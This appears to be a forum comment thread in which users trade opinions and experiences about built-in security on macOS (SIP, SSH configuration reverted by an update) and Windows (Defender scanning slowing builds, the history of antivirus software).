Apple mostly strikes a good balance in macOS (IMO) between locking as many doors as it can without getting in your way, good default UI tradeoffs, mostly reasonable escape hatches if you really do know what you’re doing, and very inconvenient escape hatches for actions which truly leave your proverbial front door unlocked. (The latter involve rebooting into the recovery volume and entering explicit commands into a CLI.) If you’re a high value target, obviously none of this is sufficient. If you’re a rando user with relatively not-reckless habits, at this point it’s like gambling with odds so close to break-even most users have good reason to think it’s a solved problem.
I don’t know what you’re referring to. In my experience, the only SSH-related thing I’ve had reverted is needing to reauthorize Keychain-based access after login if I don’t automate it. Never had my SSH config become less restricted after an update of any kind.
Thank you for clarifying and glad there’s a workaround. I mistakenly thought you meant ssh out. Haven’t had a need to ssh into any Mac for close to 20 years.
If I remember right it happened without warning and reverted my key-only config when they added SIP in an update. I believe earlier updates never wiped out my change. It left me with an insecure setup that thankfully wasn't port-forwarded publicly.
Though "Admin" likely does not mean as much as you think on macOS, as long as you keep SIP enabled (which is the default, and disabling requires explicit rebooting into a recovery OS and opening the terminal there).
Windows defender is scanning every time im building anything in visual studio during which everything on the machine grinds to a halt. I have no idea what’s hoping to find but the experience on Windows is execrable. If im listening to some audio it starts stuttering… Very beefy machine too: thinkstation desktop, 64gb ram, 8 cores, etc etc. I stopped caring and started relaxing because it’s out of my control. And you guessed it, it’s my office machine. At home I banished windows altogether.
if you are able, add your project folder as an exclusion, and maybe msbuild.exe or maybe cl etc. cant hurt
tho i have to say ive never had defender (or any io hits) cause audio to stutter outside of impending bluescreen from garbage device driver tier crashes
my only hope is that this makes erm, certain people at least give pause in the future before posting "but windows defender cant be turned off and scans all the time" in any threads about windows
Everyone complained constantly when 95-XP got viruses if you looked at them and you had to buy terrible AV programs and it still wasn’t enough.
Now the OS takes care of the vast majority of it and problems aren’t rampant.
And what do we do? Complain it might be slowing things down. That it’s taking away control. That if we want to load a virus on our computers the OS should never question us. And don’t forget this is a secret conspiracy to track us.
There’s no winning. Poor OSes. Always doing it wrong.
One surprising thing about the macbook I got last year is how often I find it burning hot with the fan going crazy despite the lid having been closed for hours. Is this in any way related to the malware scanning? The computer has been like this from the start, so I'm pretty confident it's not related to anything I changed/added.
I remember it being such a ^%#*show on Windows until I think it was called Microsoft Security Essentials? And then that got folded into Windows?
I recall as a teen how hard it was to recommend antivirus because so many of them were garbage. And then MSE made it effortless.